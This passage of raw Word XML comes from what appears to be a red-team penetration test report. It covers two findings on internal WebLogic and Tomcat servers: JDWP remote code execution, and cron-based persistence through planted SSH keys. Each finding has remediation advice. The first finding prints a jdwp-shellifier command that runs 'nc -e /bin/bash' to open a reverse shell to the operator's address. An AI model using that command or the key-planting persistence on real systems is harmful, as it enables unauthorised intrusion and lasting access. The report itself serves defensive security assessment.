      <w:r w:rsidR="003B4EBB" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00AF25D4" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">reverse </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="003B4EBB" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> connection </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">back </w:t>
      </w:r>
      <w:r w:rsidR="00302F61" w:rsidRPr="001019D3">
        <w:t>to the Red Team operator’s device</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8746"/>
      </w:tblGrid>
      <w:tr w:rsidR="003B4EBB" w:rsidRPr="001019D3" w14:paraId="5AFD95E4" w14:textId="77777777" w:rsidTr="003738E7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9518" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0D5D9A85" w14:textId="67475A15" w:rsidR="003B4EBB" w:rsidRPr="001019D3" w:rsidRDefault="003B4EBB" w:rsidP="003738E7">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>python ./jdwp-shellifier.py -t 10.130.140.150 -p 1342 --break-on '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>java.lang.String.indexOf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>' --</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> -e /bin/bash 10.226.6.104 8443'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="01CCCA6B" w14:textId="77777777" w:rsidR="0016405F" w:rsidRPr="001019D3" w:rsidRDefault="0016405F" w:rsidP="00AF25D4">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="120" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34EC18C4" wp14:editId="5DE6B869">
            <wp:extent cx="5543550" cy="1126350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16964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42238" name="Picture 16964422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2015" cy="1132134"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AC4483" w14:textId="630A5D09" w:rsidR="00302F61" w:rsidRPr="001019D3" w:rsidRDefault="0016405F" w:rsidP="00AF25D4">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="154" w:name="_Toc213253790"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00AF25D4" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">: Exploit of </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">JDWP </w:t>
      </w:r>
      <w:r w:rsidR="00AF25D4" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">launching a </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>reverse shell</w:t>
      </w:r>
      <w:r w:rsidR="00AF25D4" w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="154"/>
    </w:p>
    <w:p w14:paraId="6A9C38B4" w14:textId="616CE9F9" w:rsidR="00412AA9" w:rsidRPr="001019D3" w:rsidRDefault="0016405F" w:rsidP="00FD450B">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Screen clip taken: 17/02/2025 6:15 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4461C0" w14:textId="582FE8FD" w:rsidR="00412AA9" w:rsidRPr="001019D3" w:rsidRDefault="00412AA9" w:rsidP="00412AA9">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">The list of servers discovered to be vulnerable to JDWP can be found in annex </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref212817406 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>5.2.1</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A58EB05" w14:textId="3BCC931C" w:rsidR="00412AA9" w:rsidRPr="001019D3" w:rsidRDefault="00412AA9">
      <w:r w:rsidRPr="001019D3">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A22CBC0" w14:textId="0BAD26C7" w:rsidR="003B4EBB" w:rsidRPr="001019D3" w:rsidRDefault="003B4EBB" w:rsidP="001701C0">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:t>Recommendation</w:t>
      </w:r>
      <w:r w:rsidR="001701C0" w:rsidRPr="001019D3">
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2EA049" w14:textId="05408D0E" w:rsidR="001701C0" w:rsidRPr="001019D3" w:rsidRDefault="001701C0" w:rsidP="00503324">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Disable the Java Debug Bridge service</w:t>
      </w:r>
      <w:r w:rsidR="00503324" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> on all ETS WebLogic and Tomcat servers</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> if it is not needed for the environment, especially in production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC7E975" w14:textId="34B467DA" w:rsidR="001701C0" w:rsidRPr="001019D3" w:rsidRDefault="001701C0" w:rsidP="00503324">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Expose the Java Debug Bridge service </w:t>
      </w:r>
      <w:r w:rsidR="00503324" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">on ETS WebLogic and Tomcat servers </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>only to a restricted and dedicated network segments where only authorised and trusted users such as administrators or developers can connect, especially in production systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29541EA6" w14:textId="2BA5068C" w:rsidR="001701C0" w:rsidRPr="001019D3" w:rsidRDefault="001701C0" w:rsidP="00503324">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Use distinct service accounts with limited privileges for each </w:t>
      </w:r>
      <w:r w:rsidR="00503324" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">ETS WebLogic and Tomcat server </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>and service. This approach helps minimize the potential attack surface by restricting access rights to the bare minimum and not having the same account reused in various systems. By adhering to the principle of least privilege, service accounts will be granted only the permissions necessary for their designated tasks, reducing the risk of unauthorised access or misuse of resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A3109D" w14:textId="298ED64A" w:rsidR="007073AA" w:rsidRPr="001019D3" w:rsidRDefault="007073AA">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E5C2B6" w14:textId="53E4CDE8" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="005211B2" w:rsidP="0020401E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:pageBreakBefore/>
        <w:ind w:left="734" w:hanging="734"/>
      </w:pPr>
      <w:bookmarkStart w:id="155" w:name="_Toc198044924"/>
      <w:bookmarkStart w:id="156" w:name="_Ref209791354"/>
      <w:bookmarkStart w:id="157" w:name="_Toc209809054"/>
      <w:bookmarkStart w:id="158" w:name="_Ref213161042"/>
      <w:bookmarkStart w:id="159" w:name="_Ref207979749"/>
      <w:bookmarkStart w:id="160" w:name="_Ref208242338"/>
      <w:bookmarkStart w:id="161" w:name="_Toc212654660"/>
      <w:bookmarkStart w:id="162" w:name="_Toc213253568"/>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:t>Absence of auditing of scheduled tasks allows for p</w:t>
      </w:r>
      <w:r w:rsidR="0020401E" w:rsidRPr="001019D3">
        <w:t>ersistence</w:t>
      </w:r>
      <w:bookmarkEnd w:id="155"/>
      <w:bookmarkEnd w:id="156"/>
      <w:bookmarkEnd w:id="157"/>
      <w:bookmarkEnd w:id="158"/>
      <w:bookmarkEnd w:id="162"/>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414"/>
        <w:gridCol w:w="1914"/>
        <w:gridCol w:w="3108"/>
      </w:tblGrid>
      <w:tr w:rsidR="0020401E" w:rsidRPr="001019D3" w14:paraId="14A6B99C" w14:textId="77777777" w:rsidTr="001236CA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="036B8FB2" w14:textId="77777777" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="00312B39">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50744F65" w14:textId="77777777" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="00312B39">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Impacted assets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2873" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1916A438" w14:textId="77777777" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="00312B39">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ATT&amp;CK MITRE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0020401E" w:rsidRPr="001019D3" w14:paraId="78E65D7B" w14:textId="77777777" w:rsidTr="0020401E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B2B512A" w14:textId="2BFCDBEF" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="001236CA" w:rsidP="00312B39">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1381" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27D59AA4" w14:textId="4AA6F0B7" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="001236CA" w:rsidP="00312B39">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ETS WebLogic and Tomcat servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1095" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="489A4C03" w14:textId="77777777" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="001236CA">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="480" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA-0003</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6262DF09" w14:textId="77777777" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="00312B39">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1778" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3B95AB23" w14:textId="77777777" w:rsidR="001236CA" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="001236CA">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T1098.004</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06135535" w14:textId="645F8EC0" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="001236CA">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Account Manipulation: SSH Authorized Keys</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AD87958" w14:textId="77777777" w:rsidR="001236CA" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="001236CA">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T1053.003</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EB88C2D" w14:textId="6AD2307E" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="001236CA">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Scheduled</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> Task/Job: Cron</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02EBF076" w14:textId="77777777" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="00B44CC1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Description </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358DAC23" w14:textId="612CFC1D" w:rsidR="00F53DA0" w:rsidRPr="001019D3" w:rsidRDefault="00F53DA0" w:rsidP="00F434B3">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w:t>
      </w:r>
      <w:r w:rsidR="00B82E76" w:rsidRPr="001019D3">
        <w:t>it was possible to establish persistence</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00993EB0" w:rsidRPr="001019D3">
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> the compromised service user accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5360F121" w14:textId="60642AC7" w:rsidR="00B82E76" w:rsidRPr="001019D3" w:rsidRDefault="00F53DA0" w:rsidP="00F434B3">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00B82E76" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">y creating new or injecting commands in existing scheduled jobs run by the compromised user allows for persistence by repeating commands to copy the attacker controlled SSH keys to the authorised keys folder on a regular basis. This ensures continued access even after reboots, user logouts or removal of attacker controlled SSH keys. This technique is relatively stealthy, often blending into legitimate system activity, and can be used to maintain access, exfiltrate data, or escalate privileges over time. The associated risks are significant since persistence mechanisms can be difficult to detect without proper auditing, and they may allow attackers to maintain long-term access to compromised systems undetected. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD859CF" w14:textId="7A89920B" w:rsidR="00B82E76" w:rsidRPr="001019D3" w:rsidRDefault="00B82E76" w:rsidP="00B82E76">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E12D7A" w14:textId="77777777" w:rsidR="00811C29" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="00F434B3">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">During the campaign, it was identified that no effective auditing or monitoring was in place for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> jobs on the </w:t>
      </w:r>
      <w:r w:rsidR="00B82E76" w:rsidRPr="001019D3">
        <w:t>targeted</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> systems. This gap allows attackers to abuse </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> scheduling to establish persistence by running malicious scripts or commands at regular intervals without detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551EE2D8" w14:textId="77777777" w:rsidR="00811C29" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="00F434B3">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Although attempts to escalate privileges on the hosts were not successful it was possible to achieve persistence by abusing the user’s own privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFAD0D3" w14:textId="2D5660B6" w:rsidR="00811C29" w:rsidRPr="001019D3" w:rsidRDefault="00811C29" w:rsidP="00F434B3">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">To gain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> job persistence via SSH, the Red Team needed to first create their own SSH public and private key that they can plant on a remote system. Having a shell (remote code execution) on the remote system using the exposed JDWP service, the Red Team was able to simply copy their created keys to a location of their choosing and with some scripting add the key to the authorized keys file in the compromised user’s home folder (the local user that runs the JDWP service), either </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>wlsopert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>tomopert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>, which allows SSH connections to those use accounts without the need to provide any password of the respective user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312D68BE" w14:textId="66AA9918" w:rsidR="0020401E" w:rsidRPr="001019D3" w:rsidRDefault="0020401E" w:rsidP="00F434B3">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">It was noted that </w:t>
      </w:r>
      <w:r w:rsidR="00811C29" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">the file that contains </w:t>
      </w:r>
      <w:r w:rsidR="00F434B3" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00811C29" w:rsidRPr="001019D3">
        <w:t>authorized keys</w:t>
      </w:r>
      <w:r w:rsidR="00F434B3" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00811C29" w:rsidRPr="001019D3">
        <w:t>allow</w:t>
      </w:r>
      <w:r w:rsidR="00F434B3" w:rsidRPr="001019D3">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00811C29" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> SSH connections are </w:t>
      </w:r>
      <w:r w:rsidR="00F434B3" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">overwritten on regular </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>intervals</w:t>
      </w:r>
      <w:r w:rsidR="00811C29" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">. The compromised user </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">had </w:t>
      </w:r>
      <w:r w:rsidR="00811C29" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">no way to interfere with this </w:t>
      </w:r>
      <w:r w:rsidR="00F434B3" w:rsidRPr="001019D3">
        <w:t>rewrite</w:t>
      </w:r>
      <w:r w:rsidR="00811C29" w:rsidRPr="001019D3">
